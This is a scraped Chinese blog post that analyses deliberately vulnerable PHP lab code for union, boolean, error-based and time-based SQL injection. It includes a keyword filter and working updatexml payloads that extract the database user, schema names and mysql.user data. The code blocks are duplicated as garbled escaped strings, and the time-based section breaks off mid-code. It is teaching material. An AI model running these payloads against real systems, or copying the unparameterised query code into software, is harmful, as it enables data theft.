动态sql if else_PHP之各种SQL注入源码分析

最新推荐文章于 2023-12-13 17:25:44 发布
最新推荐文章于 2023-12-13 17:25:44 发布
阅读量128 收藏
点赞数
文章标签: 动态sql if else
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39875832/article/details/111330705
版权

数据库设置:

1834b348f11867d414418cbea64b59fa.png

union注入源码:

?php \n$con=mysqli_connect(\"localhost\",\"root\",\"root\");\nmysqli_select_db($con,'sql');\nif (mysqli_connect_errno())\n{\n\techo \"数据库连接出错:\".mysql_connect_error();\n}\n$id=$_GET[\"id\"];\n$result=mysqli_query($con,\"select * from users where id=$id\");\n$row=mysqli_fetch_array($result);\necho $row['username'].\":\".$row['address'];\necho \">br<?php 
$con=mysqli_connect("localhost","root","root");
mysqli_select_db($con,'sql');
if (mysqli_connect_errno())
{
	echo "数据库连接出错:".mysql_connect_error();
}
$id=$_GET["id"];
$result=mysqli_query($con,"select * from users where id=$id");
$row=mysqli_fetch_array($result);
echo $row['username'].":".$row['address'];
echo "
";
 ?>

9c31214e8796ccc1ca7c71f495784e2e.png

源码分析:没有进行任何过滤,将利用GET方法获取到的参数id的值拼接到SQL语句当中使之执行。

Boolean型注入源码:

?php \n$con=mysqli_connect(\"localhost\",\"root\",\"root\",\"sql\");\nif (mysqli_connect_errno()) {\n\techo \"连接失败:\".mysqli_connect_error();\n}\n$id=$_GET[\"id\"];\nif (preg_match(\"/union|sleep|benchmark/i\", $id)) {\n\texit(\"nonono\");\n}\n$result=mysqli_query($con,\"select * from users where id=$id\");\n$row=mysqli_fetch_array($result);\nif ($row) {\n\texit(\"yes\");\n}else{\n    exit(\"no\");\n}\n ?<?php 
$con=mysqli_connect("localhost","root","root","sql");
if (mysqli_connect_errno()) {
	echo "连接失败:".mysqli_connect_error();
}
$id=$_GET["id"];
if (preg_match("/union|sleep|benchmark/i", $id)) {
	exit("nonono");
}
$result=mysqli_query($con,"select * from users where id=$id");
$row=mysqli_fetch_array($result);
if ($row) {
	exit("yes");
}else{
    exit("no");
}
 ?>

68b8271fd754156d7ce54580a8804fb0.png

4503477ccb4d8eae4ab7c2762b5470fb.png

分析:(preg_match("/union|sleep|benchmark/i", $id) 在$id中所搜索是否存在union|sleep|benchmark且不区分大小写,如果存在就停止程序执行,并抛出nonono。当执行完SQL语句,结果存在,输出yes,,不存在则输出no。不会输出查询结果,只会输出yes或者no表示是否存在查询数据。

报错型注入:

?php \n$con=mysqli_connect('localhost','root','root','sql');\nif (mysqli_connect_errno()) {\n\techo \"连接失败:\".mysqli_connect_errno();\n}\n$username=$_GET['username'];\n$sql=\"select * from users where username='$username'\";\n$result=mysqli_query($con,$sql);\nif ($result) {\n\techo \"OK\";\n}else{\n\techo mysqli_error($con);\n }\n?<?php 
$con=mysqli_connect('localhost','root','root','sql');
if (mysqli_connect_errno()) {
	echo "连接失败:".mysqli_connect_errno();
}
$username=$_GET['username'];
$sql="select * from users where username='$username'";
$result=mysqli_query($con,$sql);
if ($result) {
	echo "OK";
}else{
	echo mysqli_error($con);
 }
?>

3cda299631b3db1ed1b4b668bf6f7b7b.png8967aee4b6173dfcef772c23113f31a3.png

分析:如果SQL语句执行出错,则会调用mysqli_error()输出报错信息,可以利用这个进行报错注入。

过程:

1,单引号发现报错,并输出了报错详情

dbee46642e7e7b08bce3c17e5cba16be.png

2,使用updatexml()函数进行报错

当前用户:http://127.0.0.1/sql_updatexml.php?username=aa' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+

6fe59415a7917f3f04c21ad1a7c842d6.png

当前数据库:http://127.0.0.1/sql_updatexml.php?username=aa' and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+

10a1cd6ae5278c982322f1aea40ffe9f.png

获取所有的库名:http://127.0.0.1/sql_updatexml.php?username=aa' 
and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 1,1),0x7e),1)--+

d4d3405ef32371da2a66a520736cab0b.png

获取指定库中的表名:http://127.0.0.1/sql_updatexml.php
?username=aa' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='mysql' limit 0,1),0x7e),1)--+

5f990d90aa460aea7f9c4322e592a6f6.png

查询数据:http://127.0.0.1/sql_updatexml.php
?username=aa' and updatexml(1,concat(0x7e,(select host,user from mysql.user limit 0,1),0x7e),1)--+

af14acb6cbdc1daab0753a8a19c66bb4.png

时间注入源码:

?php \n$con=mysqli_connect('localhost','root','root');\nmysqli_select_db($con,'sql');\nif (mysqli_connect_errno()) {\n\techo \"连接失败:\".mysqli_connect_error();\n}\n$id=$_GET['id'];\nif (preg_match(\"/union|ordey|coushu/i\", $id)) {\n\texit(\">hmtl<>body/body<>/htmlhmtl<>body/body<>/html<?php 
$con=mysqli_connect('localhost','root','root');
mysqli_select_db($con,'sql');
if (mysqli_connect_errno()) {
	echo "连接失败:".mysqli_connect_error();
}
$id=$_GET['id'];
if (preg_match("/union|ordey|coushu/i", $id)) {
	exit("nononono
weixin_39875832
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MyBatis基础篇九:动态SQL
czj66666666666的博客
04-01 314
My动态SQL 1、if if标签可通过test属性的表达式进行判断,若表达式的结果为true,则标签中的内容会执行;反之标签中的内容不会执行 <!--List<Emp> getEmpListByMoreTJ(Emp emp);--> <select id="getEmpListByMoreTJ" resultType="Emp"> select * from t_emp where 1=1 <if test="ename != ''
php+mysql动态网站开发实例 源码
11-05
源码分析通常会涵盖以下几个关键知识点: 1. **PHP基础**:包括变量、常量、数据类型、控制结构(如if-else、for、while循环)、函数、数组等基础知识,这些都是编写PHP脚本的基础。 2. **MySQL数据库设计**:理解...
MyBatis (五)MyBatis动态SQL
qq_51274606的博客
04-23 3532
一、动态sql的简述 什么是动态sql:在不同条件下拼接不同的sql Mybatis框架的动态sql技术是一种根据特定条件动态拼接SQl语句的功能,他存在的意义是为了解决拼接SQL语句字符串时的痛点问题。比如我们在用淘宝之类的软件在进行商品属性选择的时候,我们会发现我们可以选择的商品的属性有很多条件,其中一些条件可以选择也可以不选择,那么如果使用传统的方式进行查询,反而在拼接sql的时候会造成一些列的问题。 二、动态sql的使用案例 1. <if>标签---(注意:usernam
sql if else语句_PHP程序员从入门到佛系第十一弹:If……Else 语句
weixin_39786617的博客
12-06 283
PHP If...Else 语句条件语句用于根据不同条件执行不同动作。PHP 条件语句当您编写代码时,您常常需要为不同的判断执行不同的动作。您可以在代码中使用条件语句来完成此任务。在 PHP 中,提供了下列条件语句:if 语句 - 在条件成立时执行代码if...else 语句 - 在条件成立时执行一块代码,条件不成立时执行另一块代码if...elseif....else 语句 - 在若干条件之一成...
Java 动态代理作用是什么?
Brave_heart4pzj的博客
10-16 441
Java 动态代理作用是什么? 如果不懂动态代理就无法深入理解当下最流行的诸多框架的原理,如spring。 如果不懂动态代理大厂的offer很可能和你插肩而过。 很早就想写一篇动态代理的文章,正好看到这个问题,在回答之前我找了一些资料发现不是艰涩难懂就是模糊不清,于是我把其中最难懂的部分提炼出来,反复揣摩,用最易于理解的语言细致描述,形成了这个回答,辛苦努力没有白费,发布的这几天浏览量超过两千,收藏量也过了几百,谢谢知友们的支持~ 要理解动态代理首先要理解代理模式 什么是代理模式? 有一个打印机的类 pub
MyBatis动态SQL(if、choose、when和otherwise)标签
qq_43079001的博客
10-11 1387
动态 SQL 是 MyBatis 的强大特性之一。在 JDBC 或其它类似的框架中,开发人员通常需要手动拼接 SQL 语句。根据不同的条件拼接 SQL 语句是一件极其痛苦的工作。例如,拼接时要确保添加了必要的空格,还要注意去掉列表最后一个列名的逗号。而动态 SQL 恰好解决了这一问题,可以根据场景动态的构建查询动态 SQL 只有几个基本元素,与 JSTL 或 XML 文本处理器相似,十分简单明了,大量的判断都可以在 MyBatis 的映射 XML 文件里配置,以达到许多需要大量代码才能实现的功能。
Tanking_短网址生成_php源码_
09-30
需要注意的是,实际应用中还需考虑安全问题,如防止SQL注入、XSS攻击等,以及优化性能,例如通过缓存减少数据库查询。此外,为了提供稳定的服务,你可能还需要考虑负载均衡、故障恢复等高级话题。在开发过程中,不断...
PHP011G02_php_源码
10-02
PHP011G02_php_源码】这个压缩包文件主要关注的是PHP编程语言的源码分析PHP(Hypertext Preprocessor)是一种广泛使用的开源脚本语言,尤其适用于Web开发,可以嵌入到HTML中去。在这个压缩包中,包含了一个名为...
商业源码-编程源码-FTBBS_PHP_UTF8简体中文版 v5.2.zip
06-15
7. **安全性**:商业源码的安全性尤为重要,包括防止SQL注入、XSS攻击、CSRF等。熟悉安全编码实践,如预编译SQL语句、过滤用户输入、使用HTTP头部防护等,是确保论坛系统稳定运行的必要条件。 8. **性能优化**:...
基于PHP的舆情分析小助手(php+mysql)源码.zip
最新发布
01-15
4. **PHP与MySQL交互**:学习如何使用PDO或mysqli扩展连接和操作MySQL数据库,包括预编译语句以防止SQL注入攻击。 5. **MVC架构**:如果项目使用了MVC(Model-View-Controller)模式,需要理解各部分职责,如模型...
动态SQL
weixin_49757916的博客
05-30 1210
prefixOverrides | 去除sql语句前面的关键字或者字符,该关键字或者字符由prefixOverrides属性指定,假设该属性指定为"AND",当sql语句的开头为"AND",trim标签将会去除该"AND" |trim标签一般用于去除sql语句中多余的and关键字,逗号,或者给sql语句前拼接 “where“、“set“以及“values(“ 等前缀,或者添加“)“等后缀,可用于选择性插入、更新、删除或者条件查询等操作。select 指定查询关联的"一"的sql语句的id。
23.动态SQL之if语句
angel56789的博客
05-19 245
动态SQL之IF语句 实体类 //查询博客 List<Blog> queryBlogIf(Map map); BlogMapper.xml <select id="queryBlogIf" parameterType="Map" resultType="Blog"> select * from mybatis.blog where 1=1 <if test="title != null"> and ti
Mybatis 动态sql语句 if用法 使用心得记录
iflamma的博客
12-18 761
select from city WHERE 1 = 1 AND city_name = #{cityName} 项目正常启动,但是在访问的时候,报出AND的错误 无法识别,此处AND应改为and。 再次启动项目,依然报错,找不到NULL,此处NULL应改为null。 Mybatis的动态sql语句非常的严格,区分大小写。
动态SQL--详解&案例
WuHuaSen的博客
04-07 2003
动态SQL是mybatis的一个强大的特性。在使用JDBC编程操作数据的时候,如果查询的条件特别多,将条件串联成SQL字符串是一件非常痛苦的事情,通常的解决方法是写很多if-else条件语句对字符串进行拼接,并不能确保不能忘了空格或在字段的最后省略逗号。mybatis使用了一种强大的动态SQL语言来改善这种情形。 用于实现动态SQL的元素如下: if:利用if实现简单的条件拼接。 choose(when,otherwise):相当于java中使用的Switch语句,通常与when...
mybatis动态SQL的if元素使用
smile
11-22 1358
1.if元素是最常用的判断语句,相当于Java中的if语句,它常常与test属性联合使用,先进行简单的场景描述:根据角色名称去查找角色,但是角色名称是一个选填条件,不填写时,就不要用他作为条件查询。这是查询中常见的场景之一,if元素提供了简单的实现,代码示例如下。 2.pojo package xuexi.mybatis.pojo; /** * 角色表 * @author Admini...
八、动态SQL
m0_62639288的博客
07-07 223
以入门案例中的更新操作为例,使用元素对映射文件中更新客户信息的SQL 语句进行修改的代码如下所示。动态SQL中的元素 1、动态SQL有什么作用? 2、动态SQL主要元素 二、元素 三、元素 四、、元素 五、元素 六、元素 七、元素
Mybatis(二)——动态SQL
qq_45830276的博客
06-16 203
Mybatis框架的动态sql技术是一种根据特定条件动态拼接SQl语句的功能,他存在的意义是为了解决拼接SQL语句字符串时的痛点问题。比如我们在用淘宝之类的软件在进行商品属性选择的时候,我们会发现我们可以选择的商品的属性有很多条件,其中一些条件可以选择也可以不选择,那么如果使用传统的方式进行查询,反而在拼接sql的时候会造成一些列的问题。......
【MyBatis笔记】8 - 动态SQL:if/where/trim/choose/foreach/sql片段include
CherryChenieth的博客
03-02 1806
文章目录1、if2、where3、trim4、choose-when-otherwise5、foreach6、sql片段 include 视频教程链接:https://www.bilibili.com/video/BV1VP4y1c7j7?p=56&spm_id_from=pageDriver Mybatis框架的动态SQL技术是一种根据特定条件动态拼装SQL语句的功能,它存在的意义是为了解决拼接SQL语句字符串时的痛点问题。 1、if if标签可通过test属性的表达式进行判断,若表达式的结果
Java_Mybatis_动态SQL
Byron__的博客
12-13 1374
需求:按年龄19查找,如果id 不空按id 查找,名字不空按名字查找,否则按班级id 查找。动态 SQL 的另一个常见使用场景是对集合进行遍历(尤其是在构建 IN 条件语句的时候)suffixOverrides:去掉 trim 标签内容最后面的值。概述:不想使用所有条件时候,他们可以从多个条件中选择一个使用,prefix:可以在 trim 标签内容前面添加内容。suffix:在 trim 标签后面添加内容。需求:查询所有的学生信息,用注解方式实现。中使用动态 SQL,可以使用。
PHP代码审计:SQL注入漏洞分析
"这篇教程主要介绍了PHP代码审计中的SQL注入问题,包括普通注入和宽字节注入的案例分析,以及涉及的函数如str_replace、stripslashes和addslashes在防止SQL注入中的作用。" 在Web开发中,SQL注入是一种常见的安全...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值